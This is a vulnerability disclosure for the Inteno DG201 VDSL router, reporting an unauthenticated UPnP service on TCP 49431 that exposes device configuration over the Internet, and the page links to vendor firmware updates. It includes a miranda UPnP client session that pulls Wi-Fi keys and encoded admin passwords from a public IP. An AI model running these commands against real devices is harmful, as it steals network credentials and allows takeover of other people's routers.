== Intro ==
'''This vulnerability is reported 2013-11-22''' and it is fixed couple of month after that.
## Executive summary
## Also include any requests on disclosure dates etc here
DG201 VDSL-box has some kind of UPnP -service open to the Internet by default. Even if the box has set to bridge mode, VDSL-box will take own public IP from the Internet. 

From UPnP-service you can for example download device configuration which include passwords for Wifi and Accounts in the box. It is also possible to change configuration in the device. All this can be done without any authentication.

 * Software version: DG201A-W2U4U_4.06DNT0934.2
  * {{attachment:inteno.PNG}}

== Details ==

## Describe the case with full technical details. Divide into subsections if needed.
UPnP service can be found from port TCP 49431.

Get UPnP client and start using the service.  I used miranda: https://code.google.com/p/miranda-upnp/ 

=== Example ===

I have manually added my public IP to the configuration which is basically list of hosts in python pickle.

{{{
$ python miranda.py -s upnp-inteno.mir 

Miranda v1.3
The interactive UPnP client
Craig Heffner, http://www.devttys0.com


Host data restored:

	[0] 10.0.2.187:8888
	[1] 192.168.1.1:49431
	[2] 192.168.1.1:49431
	[3] 213.216.x.x:49431
	[4] 85.131.x.x:49431

upnp> host get 3

Requesting device and service info for 213.216.x.x:49431 (this could take a few seconds)...

Host data enumeration complete!

upnp> host send 3 LANDevice WLANConfiguration GetSecurityKeys

NewWEPKey3 : 1234567890123
NewWEPKey2 : 1234567890123
NewWEPKey1 : 1234567890123
NewWEPKey0 : 1234567890123
NewKeyPassphrase : 
NewPreSharedKey : 12345678
upnp> host send 3 InternetGatewayDevice DeviceConfig GetConfiguration

NewConfigFile : <?xml version="1.0"?>
<DslCpeConfig version="3.0">
  <InternetGatewayDevice>
    <LANDeviceNumberOfEntries>1</LANDeviceNumberOfEntries>
    <WANDeviceNumberOfEntries>3</WANDeviceNumberOfEntries>
    <DeviceInfo>
      <ProvisioningCode>12345</ProvisioningCode>
      <FirstUseDate>2012-04-11T14:46:01+00:00</FirstUseDate>
      <VendorConfigFileNumberOfEntries>0</VendorConfigFileNumberOfEntries>
    </DeviceInfo>
    <X_BROADCOM_COM_SyslogCfg>
      <Status>Enabled</Status>
      <Option>local buffer and remote</Option>
      <LocalDisplayLevel>Debug</LocalDisplayLevel>
      <ServerIPAddress>10.0.0.1</ServerIPAddress>
    </X_BROADCOM_COM_SyslogCfg>
    <X_BROADCOM_COM_LoginCfg>
      <SupportPassword>ZG5hcjNzY3VlMTEyAA==</SupportPassword>
      <UserPassword>dXNlcgo=</UserPassword>
    </X_BROADCOM_COM_LoginCfg>

...
}}}

== Update available ==
 * https://www.dna.fi/documents/15182/76543/Inteno_DNA_DG201+ja+EG500_modeemin_paivitys.pdf/87f2f9da-9360-440e-8113-03f277d524f4
 * https://www.dna.fi/documents/15182/76216/DG201A-W2U4U_4.06DNT0936.1_20140127/7f4c2113-32f2-422f-bdd5-e7a1062373c1

== Contacts ==
 * Mikko Kenttälä, Turmio @ IRCnet, mikko.kenttala(ä)iki.fi 


<<LinkedIn>>